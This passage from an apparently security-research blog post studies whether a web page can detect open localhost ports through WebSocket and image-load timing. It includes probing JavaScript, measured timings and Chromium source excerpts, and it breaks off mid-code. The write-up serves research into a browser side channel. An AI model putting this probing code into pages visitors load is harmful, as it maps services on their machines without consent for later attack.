<p>Boom. Problem solved. We can distinguish solely based on error messages whether a port is open or not.</p>
<p>Not so fast. </p>
<p>When trying to grab the error information with </p>
<div class="highlight"><pre><span></span><code><span class="c1">// outputs: Error: null</span>
<span class="kd">var</span> <span class="nx">errorMessage</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="k">try</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">ws</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">WebSocket</span><span class="p">(</span><span class="s2">"ws://127.0.0.1:8889/"</span><span class="p">)</span>
<span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// this code will never run</span>
<span class="nx">errorMessage</span> <span class="o">=</span> <span class="nx">err</span><span class="p">.</span><span class="nx">toString</span><span class="p">();</span>
<span class="p">}</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Error: '</span> <span class="o">+</span> <span class="nx">errorMessage</span><span class="p">)</span>
</code></pre></div>
<p>we get a meager output of <code>Error: null</code>. The error that is shown in the console is not accessible to JavaScript!</p>
<p>But since we are very smart, we try to get error details via the <code>WebSocket.onerror</code> event handler:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">ws</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">WebSocket</span><span class="p">(</span><span class="s2">"ws://127.0.0.1:8889/"</span><span class="p">)</span>
<span class="nx">ws</span><span class="p">.</span><span class="nx">onerror</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">error</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">error</span><span class="p">(</span><span class="s2">"WebSocket error observed:"</span><span class="p">,</span> <span class="nx">error</span><span class="p">);</span>
<span class="p">};</span>
</code></pre></div>
<p>However, the <code>error</code> object does not differ for the two cases. Based on the <code>error</code> object, it is not possible to determine
whether the port was open or not!</p>
<p>The same applies to <code><img></code> tags.</p>
<p>The following code will not reveal error information that helps us to infer whether the port was open or not:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">img</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">Image</span><span class="p">();</span>
<span class="nx">img</span><span class="p">.</span><span class="nx">onerror</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">(</span><span class="nx">error</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">error</span><span class="p">(</span><span class="s2">"Image error observed:"</span><span class="p">,</span> <span class="nx">error</span><span class="p">);</span>
<span class="p">};</span>
<span class="nx">img</span><span class="p">.</span><span class="nx">onload</span> <span class="o">=</span> <span class="nx">img</span><span class="p">.</span><span class="nx">onerror</span><span class="p">;</span>
<span class="nx">img</span><span class="p">.</span><span class="nx">src</span> <span class="o">=</span> <span class="s2">"http://127.0.0.1:8889/"</span><span class="p">;</span>
</code></pre></div>
<p>The <code>onerror</code> events simply do not expose much information to JavaScript.</p>
<p>What to do? </p>
<p>Yes, you guessed correctly.</p>
<p>We will attempt to check if we can detect open ports by measuring the response times ;)</p>
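<p>The demo at the top of this article turns such timings into a verdict with two simple tests: the probed port must be slower in total than a port that is assumed to be closed (by a factor of 1.3), and it must be slower in at least 80% of the paired runs. A minimal sketch of that decision rule as a pure function could look as follows. The name <code>looksOpen</code>, its parameters and the sample numbers are made up for illustration; they are not measurements from this article.</p>

```javascript
// Hypothetical helper (not part of the demo): decides whether the probed port
// looks open, given paired timings in milliseconds for the probed port and
// for a port that is assumed to be closed.
function looksOpen(timingsProbe, timingsClosed, factor = 1.3, share = 0.8) {
  if (timingsProbe.length === 0 || timingsProbe.length !== timingsClosed.length) {
    throw new Error('need two non-empty arrays of equal length');
  }
  const sum = (arr) => arr.reduce((a, b) => a + b, 0);
  const n = timingsProbe.length;

  // Test 1: the probed port is slower in total by at least `factor`.
  const slowerInTotal = sum(timingsProbe) >= sum(timingsClosed) * factor;

  // Test 2: the probed port is slower in at least `share` of the paired runs.
  let m = 0;
  for (let i = 0; i < n; i++) {
    if (timingsProbe[i] > timingsClosed[i]) {
      m++;
    }
  }
  const slowerInMostRuns = m >= Math.floor(share * n);

  return { open: slowerInTotal && slowerInMostRuns, m, n };
}

// Made-up timings for illustration only.
console.log(looksOpen([12, 14, 11, 15, 13], [6, 7, 12, 6, 5]));
console.log(looksOpen([6, 7, 5, 6, 7], [6, 6, 6, 7, 6]));
```

<p>Requiring both tests at once makes the rule a bit more robust against a single slow outlier, at the cost of needing several paired measurements per port.</p>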
<h3>About Timing Measurements in JavaScript</h3>
<p>The most precise time measurements can be obtained via <a href="https://developer.mozilla.org/en-US/docs/Web/API/Performance/now">performance.now()</a>.</p>
<p>One problem is that <code>performance.now()</code> has reduced accuracy, as the following <a href="https://news.ycombinator.com/item?id=16103270">Hacker News discussion</a> states. If I am not mistaken, accuracy was reduced to mitigate Spectre and Meltdown style attacks.</p>
<p>The following snippet showcases <code>performance.now()</code> accuracy:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">results</span> <span class="o">=</span> <span class="p">[]</span>
<span class="kd">let</span> <span class="nx">then</span> <span class="o">=</span> <span class="mf">0</span>
<span class="k">for</span><span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="mf">500</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">now</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">Math</span><span class="p">.</span><span class="nx">abs</span><span class="p">(</span><span class="nx">now</span> <span class="o">-</span> <span class="nx">then</span><span class="p">)</span> <span class="o">></span> <span class="mf">1e-6</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">results</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">now</span><span class="p">)</span>
<span class="nx">then</span> <span class="o">=</span> <span class="nx">now</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">results</span><span class="p">.</span><span class="nx">join</span><span class="p">(</span><span class="s2">"\n"</span><span class="p">))</span>
</code></pre></div>
<p>Based on the script above, it seems that the accuracy is fine-grained enough for our use case.</p>
<p>To measure network and socket timeouts, we need single-digit millisecond accuracy. According to the Hacker News discussion linked above, the timer in Chrome is <strong>accurate to 100us</strong>. This is more than enough for our use case.</p>
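<p>To put a number on the timer granularity in a given environment, a small sketch like the following can help. It busy-waits until <code>performance.now()</code> returns a new value and keeps the smallest step it has seen. The function name <code>estimateTimerStep</code> is hypothetical, and the sketch assumes that <code>performance</code> is available as a global (browsers and recent Node.js versions).</p>

```javascript
// Hypothetical helper: estimates the smallest step that performance.now()
// reports by busy-waiting until the returned value changes.
function estimateTimerStep(ticks = 20) {
  let smallest = Infinity;
  let last = performance.now();
  let seen = 0;
  while (seen < ticks) {
    const now = performance.now();
    if (now !== last) {
      // the clock is monotonic, so the difference is always positive
      smallest = Math.min(smallest, now - last);
      last = now;
      seen++;
    }
  }
  return smallest;
}

console.log('smallest observed step in ms:', estimateTimerStep());
```

<p>The result is only an upper bound on the real granularity and depends on the browser, its version and its isolation settings.</p>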
<h3>Port Scanning with Web Sockets</h3>
<p>My first attempt was to use <a href="https://developer.mozilla.org/en-US/docs/Web/API/WebSocket">WebSockets</a> to conduct localhost port scanning. I came up with the following JavaScript that measures WebSocket connection timeouts:</p>
<div class="highlight"><pre><span></span><code><span class="c1">// start local server with</span>
<span class="c1">// python -m http.server --bind 127.0.0.1 8888</span>
<span class="kd">var</span> <span class="nx">checkPort</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">port</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">t0</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span>
<span class="c1">// a random appendix to the URL to prevent caching</span>
<span class="kd">var</span> <span class="nx">random</span> <span class="o">=</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">random</span><span class="p">().</span><span class="nx">toString</span><span class="p">().</span><span class="nx">replace</span><span class="p">(</span><span class="s1">'0.'</span><span class="p">,</span> <span class="s1">''</span><span class="p">).</span><span class="nx">slice</span><span class="p">(</span><span class="mf">0</span><span class="p">,</span> <span class="mf">7</span><span class="p">)</span>
<span class="kd">var</span> <span class="nx">ws</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">WebSocket</span><span class="p">(</span><span class="s2">"ws://127.0.0.1:"</span> <span class="o">+</span> <span class="nx">port</span> <span class="o">+</span> <span class="s1">'/'</span> <span class="o">+</span> <span class="nx">random</span><span class="p">)</span>
<span class="kd">var</span> <span class="nx">status</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="nx">ws</span><span class="p">.</span><span class="nx">onerror</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="nx">status</span> <span class="o">=</span> <span class="s1">'onerror: '</span> <span class="o">+</span> <span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">t0</span><span class="p">)</span>
<span class="p">}</span>
<span class="nx">ws</span><span class="p">.</span><span class="nx">onclose</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="nx">status</span> <span class="o">=</span> <span class="s1">'onclose: '</span> <span class="o">+</span> <span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">t0</span><span class="p">)</span>
<span class="p">}</span>
<span class="nx">setTimeout</span><span class="p">(()</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">status</span><span class="p">)</span>
<span class="nx">ws</span><span class="p">.</span><span class="nx">close</span><span class="p">()</span>
<span class="p">},</span> <span class="mf">200</span><span class="p">)</span>
<span class="p">}</span>
<span class="nx">checkPort</span><span class="p">(</span><span class="mf">8888</span><span class="p">)</span>
</code></pre></div>
<p>The idea is the following: I want to test if the above snippet yields significantly different timeouts for a URL that
points to an open TCP service compared to a URL with a port where no service is running.</p>
<p>First, I started a simple HTTP server on the port 8888 with the command </p>
<div class="highlight"><pre><span></span><code>python -m http.server --bind <span class="m">127</span>.0.0.1 <span class="m">8888</span>
</code></pre></div>
<p>Then I launched the browser, navigated to <code>incolumitas.com</code> and pasted the above script into the console.</p>
<p>After repeating this step 10 times (open browser, navigate to site, paste code and take time measurement, close browser), I got the following timeouts:</p>
<div class="highlight"><pre><span></span><code><span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">13.179999999920256</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">9.160000000520085</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">17.110000000684522</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">7.840000000214786</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">8.205000000089058</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">15.51000000017666</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">7.150000000365253</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">13.845000000401342</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">17.30500000030588</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">9.01499999963562</span><span class="w"></span>
</code></pre></div>
<p>And then I did the same process with the port 8889, where no service is running. I got the following timeouts after 10 runs:</p>
<div class="highlight"><pre><span></span><code><span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">7.255000000441214</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">5.694999999832362</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">8.78999999986263</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">6.68500000028871</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">11.080000000220025</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">6.844999999884749</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">8.659999999508727</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">7.13999999970838</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">8.420000000114669</span><span class="w"></span>
<span class="n">onclose</span><span class="o">:</span><span class="w"> </span><span class="mf">5.494999999427819</span><span class="w"></span>
</code></pre></div>
<p>There is a slight difference in timings, but it's not a vast difference. Based on timing, you cannot really distinguish whether a port is open or not.</p>
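<p>To quantify this, the two series can be summarized with a few lines of JavaScript. The sketch below uses the measurements from above, rounded to three decimals. The helper <code>summarize</code> is a hypothetical name introduced only for this illustration.</p>

```javascript
// Timings in milliseconds, rounded to three decimals from the two lists above.
const openPort = [13.18, 9.16, 17.11, 7.84, 8.205, 15.51, 7.15, 13.845, 17.305, 9.015];
const closedPort = [7.255, 5.695, 8.79, 6.685, 11.08, 6.845, 8.66, 7.14, 8.42, 5.495];

// Hypothetical helper: mean, minimum and maximum of a list of timings.
function summarize(timings) {
  const mean = timings.reduce((a, b) => a + b, 0) / timings.length;
  return { mean, min: Math.min(...timings), max: Math.max(...timings) };
}

const openStats = summarize(openPort);
const closedStats = summarize(closedPort);

// The ranges overlap if the fastest run against the open port is not slower
// than the slowest run against the closed port.
const rangesOverlap = openStats.min <= closedStats.max;

console.log(openStats, closedStats, rangesOverlap);
```

<p>The means differ by roughly 4 ms, but the ranges overlap: the fastest run against the open port (7.15 ms) is quicker than the slowest run against the closed port (11.08 ms). A single measurement is therefore not enough to tell the two cases apart.</p>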
<p>But why did I do this process manually? Why did I restart the browser after each measurement taken?</p>
<p>The reason is that Chromium makes it very hard to determine whether a port is open or closed by considering time measurements.</p>
<p>Furthermore, once a socket is created for a <code>(host, port)</code> pair, this socket is shared among normal HTTP connections. The document <a href="https://docs.google.com/document/d/1a8sUFQsbN5uve7ziW61ATkrFr3o9A-Tiyw8ig6T3puA/edit#">"WebSocket Throttling Design"</a> states:</p>
<blockquote>
<p>The new WebSocket stack re-uses the HTTP stack for its handshake.</p>
</blockquote>
<p>and </p>
<blockquote>
<p>The major issue with this design as it stands is that proxy connections for WebSockets share the ConnectionPoolManager with direct connections.</p>
</blockquote>
<h3>A Dive into the Chromium WebSocket Source Code</h3>
<p>For example, you can look into the <a href="https://chromium.googlesource.com/chromium/src/+/master/net/websockets/websocket_stream.cc">Chrome WebSocket source code</a>.</p>
<p>The file <code>websocket_stream.cc</code> contains some interesting sections. A timeout interval constant is defined there. The mechanism is intended <em>to make it hard for JavaScript programs to recognize the timeout cause</em>.</p>
<div class="highlight"><pre><span></span><code><span class="c1">// The timeout duration of WebSocket handshake.</span>
<span class="c1">// It is defined as the same value as the TCP connection timeout value in</span>
<span class="c1">// net/socket/websocket_transport_client_socket_pool.cc to make it hard for</span>
<span class="c1">// JavaScript programs to recognize the timeout cause.</span>
<span class="k">const</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">kHandshakeTimeoutIntervalInSeconds</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">240</span><span class="p">;</span><span class="w"></span>
</code></pre></div>
<p>This is the <code>Start()</code> method that starts a WebSocket connection.</p>
<div class="highlight"><pre><span></span><code><span class="kt">void</span><span class="w"> </span><span class="nf">Start</span><span class="p">(</span><span class="n">std</span><span class="o">::</span><span class="n">unique_ptr</span><span class="o"><</span><span class="n">base</span><span class="o">::</span><span class="n">OneShotTimer</span><span class="o">></span><span class="w"> </span><span class="n">timer</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">DCHECK</span><span class="p">(</span><span class="n">timer</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">base</span><span class="o">::</span><span class="n">TimeDelta</span><span class="w"> </span><span class="n">timeout</span><span class="p">(</span><span class="n">base</span><span class="o">::</span><span class="n">TimeDelta</span><span class="o">::</span><span class="n">FromSeconds</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">kHandshakeTimeoutIntervalInSeconds</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="n">timer_</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">std</span><span class="o">::</span><span class="n">move</span><span class="p">(</span><span class="n">timer</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">timer_</span><span class="o">-></span><span class="n">Start</span><span class="p">(</span><span class="n">FROM_HERE</span><span class="p">,</span><span class="w"> </span><span class="n">timeout</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">base</span><span class="o">::</span><span class="n">BindOnce</span><span class="p">(</span><span class="o">&</span><span class="n">WebSocketStreamRequestImpl</span><span class="o">::</span><span class="n">OnTimeout</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">base</span><span class="o">::</span><span class="n">Unretained</span><span class="p">(</span><span class="k">this</span><span class="p">)));</span><span class="w"></span>
<span class="w"> </span><span class="n">url_request_</span><span class="o">-></span><span class="n">Start</span><span class="p">();</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>So what kind of timer is stored in the variable <code>timer_</code>?</p>
<div class="highlight"><pre><span></span><code><span class="w"> </span><span class="c1">// A timer for handshake timeout.</span>
<span class="w"> </span><span class="n">std</span><span class="o">::</span><span class="n">unique_ptr</span><span class="o"><</span><span class="n">base</span><span class="o">::</span><span class="n">OneShotTimer</span><span class="o">></span><span class="w"> </span><span class="n">timer_</span><span class="p">;</span><span class="w"></span>
</code></pre></div>
<p>A brief look into <a href="https://chromium.googlesource.com/chromium/src/+/master/base/timer/timer.h">/master/base/timer/timer.h</a> reveals what this timer does: </p>
<blockquote>
<p>As the names suggest, OneShotTimer calls you back once after a time delay expires.</p>
</blockquote>
<p>Therefore, this timer fires once when the WebSocket handshake times out.</p>
<p>Then, we have a look into <a href="https://github.com/chromium/chromium/blob/master/net/socket/websocket_transport_client_socket_pool.cc">websocket_transport_client_socket_pool.cc</a> and we see the method </p>
<div class="highlight"><pre><span></span><code><span class="kt">void</span><span class="w"> </span><span class="nf">WebSocketTransportClientSocketPool::InvokeUserCallbackLater</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">ClientSocketHandle</span><span class="o">*</span><span class="w"> </span><span class="n">handle</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">CompletionOnceCallback</span><span class="w"> </span><span class="n">callback</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">rv</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">DCHECK</span><span class="p">(</span><span class="o">!</span><span class="n">pending_callbacks_</span><span class="p">.</span><span class="n">count</span><span class="p">(</span><span class="n">handle</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="n">pending_callbacks_</span><span class="p">.</span><span class="n">insert</span><span class="p">(</span><span class="n">handle</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">base</span><span class="o">::</span><span class="n">ThreadTaskRunnerHandle</span><span class="o">::</span><span class="n">Get</span><span class="p">()</span><span class="o">-></span><span class="n">PostTask</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">FROM_HERE</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">base</span><span class="o">::</span><span class="n">BindOnce</span><span class="p">(</span><span class="o">&</span><span class="n">WebSocketTransportClientSocketPool</span><span class="o">::</span><span class="n">InvokeUserCallback</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">weak_factory_</span><span class="p">.</span><span class="n">GetWeakPtr</span><span class="p">(),</span><span class="w"> </span><span class="n">handle</span><span class="p">,</span><span class="w"> </span><span class="n">std</span><span class="o">::</span><span class="n">move</span><span class="p">(</span><span class="n">callback</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="n">rv</span><span class="p">));</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>The method <code>InvokeUserCallbackLater()</code> is invoked in all of the following cases:</p>
<ul>
<li>when a WebSocket connection is successful</li>
<li>when a WebSocket connection failed because the port is closed</li>
<li>when a WebSocket connection failed because the service does not speak the same protocol...</li>
</ul>
<h4>Top Down Approach</h4>
<p>However, we are interested in the logic that aborts the control flow when the connection could not be established. </p>
<p>Put differently, where does the Chrome source code decide that no valid WebSocket service is running on this port?</p>
<p>So we have to scan the chrome <a href="https://github.com/chromium/chromium/tree/master/net/websockets">WebSocket source code</a> for the generation of this error message: <code>Error during WebSocket handshake: Unexpected response code: 404</code>.</p>
<p>After a quick search in the <a href="https://github.com/chromium/chromium/">GitHub chrome source code mirror</a>, we find the location to be in the file <a href="">websocket_basic_handshake_stream.cc</a> on line 464:</p>
<div class="highlight"><pre><span></span><code><span class="k">switch</span><span class="w"> </span><span class="p">(</span><span class="n">response_code</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="nl">HTTP_SWITCHING_PROTOCOLS</span><span class="p">:</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">ValidateUpgradeResponse</span><span class="p">(</span><span class="n">headers</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="c1">// We need to pass these through for authentication to work.</span>
<span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="nl">HTTP_UNAUTHORIZED</span><span class="p">:</span><span class="w"></span>
<span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="nl">HTTP_PROXY_AUTHENTICATION_REQUIRED</span><span class="p">:</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">OK</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="c1">// Other status codes are potentially risky (see the warnings in the</span>
<span class="w"> </span><span class="c1">// WHATWG WebSocket API spec) and so are dropped by default.</span>
<span class="w"> </span><span class="k">default</span><span class="o">:</span><span class="w"></span>
<span class="w"> </span><span class="c1">// A WebSocket server cannot be using HTTP/0.9, so if we see version</span>
<span class="w"> </span><span class="c1">// 0.9, it means the response was garbage.</span>
<span class="w"> </span><span class="c1">// Reporting "Unexpected response code: 200" in this case is not</span>
<span class="w"> </span><span class="c1">// helpful, so use a different error message.</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">headers</span><span class="o">-></span><span class="n">GetHttpVersion</span><span class="p">()</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">HttpVersion</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="mi">9</span><span class="p">))</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">OnFailure</span><span class="p">(</span><span class="s">"Error during WebSocket handshake: Invalid status line"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">ERR_FAILED</span><span class="p">,</span><span class="w"> </span><span class="n">base</span><span class="o">::</span><span class="n">nullopt</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">OnFailure</span><span class="p">(</span><span class="n">base</span><span class="o">::</span><span class="n">StringPrintf</span><span class="p">(</span><span class="s">"Error during WebSocket handshake: "</span><span class="w"></span>
<span class="w"> </span><span class="s">"Unexpected response code: %d"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">headers</span><span class="o">-></span><span class="n">response_code</span><span class="p">()),</span><span class="w"></span>
<span class="w"> </span><span class="n">ERR_FAILED</span><span class="p">,</span><span class="w"> </span><span class="n">headers</span><span class="o">-></span><span class="n">response_code</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">result_</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">HandshakeResult</span><span class="o">::</span><span class="n">INVALID_STATUS</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">ERR_INVALID_RESPONSE</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>The method <code>OnFailure()</code> is called, which is defined in the file <a href="https://chromium.googlesource.com/chromium/src/+/master/net/websockets/websocket_stream.cc">websocket_stream.cc</a> on line 151:</p>
<div class="highlight"><pre><span></span><code><span class="kt">void</span><span class="w"> </span><span class="nf">OnFailure</span><span class="p">(</span><span class="k">const</span><span class="w"> </span><span class="n">std</span><span class="o">::</span><span class="n">string</span><span class="o">&</span><span class="w"> </span><span class="n">message</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">net_error</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">base</span><span class="o">::</span><span class="n">Optional</span><span class="o"><</span><span class="kt">int</span><span class="o">></span><span class="w"> </span><span class="n">response_code</span><span class="p">)</span><span class="w"> </span><span class="k">override</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">api_delegate_</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">api_delegate_</span><span class="o">-></span><span class="n">OnFailure</span><span class="p">(</span><span class="n">message</span><span class="p">,</span><span class="w"> </span><span class="n">net_error</span><span class="p">,</span><span class="w"> </span><span class="n">response_code</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">failure_message_</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">message</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">failure_net_error_</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">net_error</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">failure_response_code_</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">response_code</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>It does not look like the method <code>OnFailure()</code> is delayed or fired with a timer. Therefore, it should be possible to observe timing differences.</p>
<h3>Statistically significant Tests</h3>
<p>Well, now we have learned the following two things:</p>
<ul>
<li>When we reuse sockets in Chromium, we will get skewed results. It is mandatory to either restart the browser, or at least close the socket with <code>ws.close()</code>.</li>
<li><code>OnFailure()</code> is not artificially delayed. Therefore, there should be slight differences in timing when making a WebSocket connection to a closed port compared to an open port.</li>
</ul>
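<p>The following program attempts to connect <code>N = 30</code> times to an open port and 30 times to a (likely) closed port. The snippet measures one port per run, so <code>port</code> has to be changed between the two runs.</p>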
<p>After each attempt, the socket is closed, before a new connection is made.</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">timePort</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">port</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">((</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">t0</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span>
<span class="c1">// a random appendix to the URL to prevent caching</span>
<span class="kd">var</span> <span class="nx">random</span> <span class="o">=</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">random</span><span class="p">().</span><span class="nx">toString</span><span class="p">().</span><span class="nx">replace</span><span class="p">(</span><span class="s1">'0.'</span><span class="p">,</span> <span class="s1">''</span><span class="p">).</span><span class="nx">slice</span><span class="p">(</span><span class="mf">0</span><span class="p">,</span> <span class="mf">7</span><span class="p">)</span>
<span class="kd">var</span> <span class="nx">ws</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">WebSocket</span><span class="p">(</span><span class="s2">"ws://127.0.0.1:"</span> <span class="o">+</span> <span class="nx">port</span> <span class="o">+</span> <span class="s1">'/'</span> <span class="o">+</span> <span class="nx">random</span><span class="p">)</span>
<span class="nx">ws</span><span class="p">.</span><span class="nx">onerror</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">elapsed</span> <span class="o">=</span> <span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">t0</span><span class="p">)</span>
<span class="c1">// close the socket before we return</span>
<span class="nx">ws</span><span class="p">.</span><span class="nx">close</span><span class="p">()</span>
<span class="nx">resolve</span><span class="p">(</span><span class="nb">parseFloat</span><span class="p">(</span><span class="nx">elapsed</span><span class="p">.</span><span class="nx">toFixed</span><span class="p">(</span><span class="mf">3</span><span class="p">)))</span>
<span class="p">}</span>
<span class="p">})</span>
<span class="p">}</span>
